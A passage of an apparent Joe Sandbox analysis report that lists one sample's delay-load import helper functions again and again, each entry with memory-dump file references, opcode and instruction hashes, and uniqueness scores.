                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 23138a57357ffa027b43a86cd41b995a15e4fb7a94f69f163434abe41e72dfb9
                                                                                                                                          • Instruction ID: c50a0fc867f2c1da5c1329fc296e99254feae9280dfe67de4805f59c9de1faae
                                                                                                                                          • Opcode Fuzzy Hash: 23138a57357ffa027b43a86cd41b995a15e4fb7a94f69f163434abe41e72dfb9
                                                                                                                                          • Instruction Fuzzy Hash: CCB012E1398194AC717861069D03CBB020DD3C4F20330843EF91AC08E1DD406C412871
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 79893a6d1215d8a36ec4c2e1cefc22bc9b0c028834ac97785a21d0280e05f016
                                                                                                                                          • Instruction ID: 9c347bbc3487030de2517cfd8ee100ad1f13d7ae545e0a0ec08de0c924ce4ff5
                                                                                                                                          • Opcode Fuzzy Hash: 79893a6d1215d8a36ec4c2e1cefc22bc9b0c028834ac97785a21d0280e05f016
                                                                                                                                          • Instruction Fuzzy Hash: A5B012E12982D47C720CA1049E0ACBB021CC3C0B20330C13EF719D29E1DD400D4A2473
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 96f5159a3a35b4f7b3d713df1ad137277d772d87424ef443796600aa88f52385
                                                                                                                                          • Instruction ID: 7bdd5169c7d57105db8660721fba4f587c72fe7d196a99fdc55d0c8cf856e4cc
                                                                                                                                          • Opcode Fuzzy Hash: 96f5159a3a35b4f7b3d713df1ad137277d772d87424ef443796600aa88f52385
                                                                                                                                          • Instruction Fuzzy Hash: 4DB012F12982C4BC710CA1049D0AC7B021CC3C0F20330823EF919D29A1DD404F412473
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 8db0c12c5d71485de150e23fd0e1fa2cb4e1ecf546dbaca1ffa13ae7db42f8ba
                                                                                                                                          • Instruction ID: c816e881656a318e356d7e18929936baac22dcef6a17536cb85d8ea31d9ce40c
                                                                                                                                          • Opcode Fuzzy Hash: 8db0c12c5d71485de150e23fd0e1fa2cb4e1ecf546dbaca1ffa13ae7db42f8ba
                                                                                                                                          • Instruction Fuzzy Hash: BFB012E12982C4BC710CE1049D0AC7B025CC3C0B20330C13EFA19D29E1DD404D452473
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 6322c6725555160107aabc9e4cddc998eea813172f089aa0c55423c6194fe99f
                                                                                                                                          • Instruction ID: 0071eb2cfad5473fb51be9cccb90142a6f43e239cc61c1bb22c15e995e50d294
                                                                                                                                          • Opcode Fuzzy Hash: 6322c6725555160107aabc9e4cddc998eea813172f089aa0c55423c6194fe99f
                                                                                                                                          • Instruction Fuzzy Hash: 21B012C16995847C710821249D06D7F010CC7C1F20330413EF525D0CA3ED400D452471
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 6c926cf638f93721d1ed44473546c5dff7c425f0ecb4242545844a77b4841297
                                                                                                                                          • Instruction ID: f338d8f661a6659f22edab2aeac0eddcaa2626a7fbebd68da099d1366f5b8415
                                                                                                                                          • Opcode Fuzzy Hash: 6c926cf638f93721d1ed44473546c5dff7c425f0ecb4242545844a77b4841297
                                                                                                                                          • Instruction Fuzzy Hash: D0B012C16995C47C720C61089E02D7F050CC3C1F20330813EF619C19A2ED400C422471
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 6fe383e7534957afdc61e5b350261d5082fc4cf38209dc96278331d74037a42b
                                                                                                                                          • Instruction ID: 4b7c7f5b45cfe545c9b23722a775ae261e29659870c5bcf31980c4a0db585e21
                                                                                                                                          • Opcode Fuzzy Hash: 6fe383e7534957afdc61e5b350261d5082fc4cf38209dc96278331d74037a42b
                                                                                                                                          • Instruction Fuzzy Hash: 3BB012C16995847D710C61089D02E7F010CC3C1F20330413EF519C19A2ED400C412471
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 47d07c38334b3e89a08ad7d0fb2132817e0b959fce6f87695e111baf937b0cee
                                                                                                                                          • Instruction ID: 38cf5d40584ccb70607970de0d87ba2a02011fd12b609ff2ce2ee1814ee990d3
                                                                                                                                          • Opcode Fuzzy Hash: 47d07c38334b3e89a08ad7d0fb2132817e0b959fce6f87695e111baf937b0cee
                                                                                                                                          • Instruction Fuzzy Hash: B1B012C16996847C72186108DD03D7F010CC3C1F20330433EF519C19A2EE400C852471
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE580
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: df807191a028c22304da520b4a2c76c875ab48b2dd43279b04742d79714ba710
                                                                                                                                          • Instruction ID: 0e926dfa2cbeb30394be9dd787f9d0c166f465c6f9f07035a40c7e47d2576a53
                                                                                                                                          • Opcode Fuzzy Hash: df807191a028c22304da520b4a2c76c875ab48b2dd43279b04742d79714ba710
                                                                                                                                          • Instruction Fuzzy Hash: 39B012C129828C7D710C61549D02C7B010CC3C0F20330403EF519C59A1ED400C412471
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE580
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 2cbdeb058227375f3412ad1f90e9e91f4133ab3e049d168b8e7f82858f20271f
                                                                                                                                          • Instruction ID: e63afccc854bdb3c38d486d97bbf4994b6012c09887795863605bdf06b4e6a65
                                                                                                                                          • Opcode Fuzzy Hash: 2cbdeb058227375f3412ad1f90e9e91f4133ab3e049d168b8e7f82858f20271f
                                                                                                                                          • Instruction Fuzzy Hash: 30B012C12982887C71086154DE02C7B011CC3C0F20334423EF519C59A1EE400D422471
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE580
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 2da335cd0cc83ec32f6e70db5856cb8df97ebbba861e62ad34ff3223e130b971
                                                                                                                                          • Instruction ID: aa0f9d7f905af06cb2620779bac62b253216838c40e23128d37bbd2cb7318a55
                                                                                                                                          • Opcode Fuzzy Hash: 2da335cd0cc83ec32f6e70db5856cb8df97ebbba861e62ad34ff3223e130b971
                                                                                                                                          • Instruction Fuzzy Hash: 5AB012C12983887C71486154DD03C7B011CC3C0F20334423EF519C59A1EE400C812471
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 62606f4f7f76207a3667342c21f5fe543d3bada6cc7cab6be7cc52c1fd116bf3
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: 62606f4f7f76207a3667342c21f5fe543d3bada6cc7cab6be7cc52c1fd116bf3
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 4353db3333fc0f9499554db7bf2e0e90e7e7c6c9bf5a9eda208ed8675a36e2ab
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: 4353db3333fc0f9499554db7bf2e0e90e7e7c6c9bf5a9eda208ed8675a36e2ab
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: f6842ed2f083c4e8a02bc4d0de6f49ca9376249fb1be4f7e0168024a71470798
